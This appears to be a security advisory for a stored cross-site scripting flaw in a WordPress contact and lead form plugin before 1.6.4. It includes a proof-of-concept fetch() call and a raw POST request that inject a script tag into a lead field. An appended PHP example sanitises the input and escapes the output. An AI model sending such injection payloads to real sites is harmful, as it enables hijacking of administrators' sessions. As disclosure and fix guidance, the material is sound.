
Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged-in admin viewing the inserted Leads.

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data",
  "method": "POST",
});

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 136
Connection: close

name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data



The XSS will be triggered when viewing the Leads at https://example.com/wp-admin/admin.php?page=all-form-leads
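To illustrate the fix the description implies, here is an added example (not the plugin's own code) of how a handler for the Save_Form_Data action and the Leads page can sanitise lead values on input and escape them on output. The function names and the option key are assumptions; the field names follow the PoC request above.

```php
<?php
// Added example, not the plugin's code. Handler/function names and the
// 'example_form_leads' option key are assumptions; field names match the PoC.
add_action( 'wp_ajax_nopriv_Save_Form_Data', 'example_save_form_data' );
add_action( 'wp_ajax_Save_Form_Data', 'example_save_form_data' );

function example_save_form_data() {
    // Input side: sanitise each lead value according to the type it should hold.
    // sanitize_text_field() strips tags, so "<script>alert(/XSS/);</script>"
    // is stored as "alert(/XSS/);" rather than as markup.
    $lead = array(
        'name'    => sanitize_text_field( wp_unslash( $_POST['name_1'] ?? '' ) ),
        'email'   => sanitize_email( wp_unslash( $_POST['email_2'] ?? '' ) ),
        'number'  => preg_replace( '/\D/', '', sanitize_text_field( wp_unslash( $_POST['number_3'] ?? '' ) ) ),
        'message' => sanitize_textarea_field( wp_unslash( $_POST['message_4'] ?? '' ) ),
        'created' => current_time( 'mysql' ),
    );
    if ( ! is_email( $lead['email'] ) ) {
        wp_send_json_error( array( 'message' => 'Invalid email address.' ), 400 );
    }
    $leads   = get_option( 'example_form_leads', array() );
    $leads[] = $lead;
    update_option( 'example_form_leads', $leads, false );
    wp_send_json_success();
}

// Output side: escape every value where it is rendered, independently of what
// was sanitised on the way in, so the admin Leads page never emits raw HTML
// even for records stored before the input filtering existed.
function example_render_leads_table() {
    $leads = get_option( 'example_form_leads', array() );
    echo '<table class="widefat"><thead><tr><th>Name</th><th>Email</th>'
       . '<th>Number</th><th>Message</th><th>Created</th></tr></thead><tbody>';
    foreach ( $leads as $lead ) {
        printf(
            '<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>',
            esc_html( $lead['name'] ?? '' ),
            esc_html( $lead['email'] ?? '' ),
            esc_html( $lead['number'] ?? '' ),
            esc_html( $lead['message'] ?? '' ),
            esc_html( $lead['created'] ?? '' )
        );
    }
    echo '</tbody></table>';
}
```

The two layers are deliberate: input sanitisation limits what is stored, and output escaping with esc_html() is what actually prevents a stored value from being interpreted as markup on the Leads page.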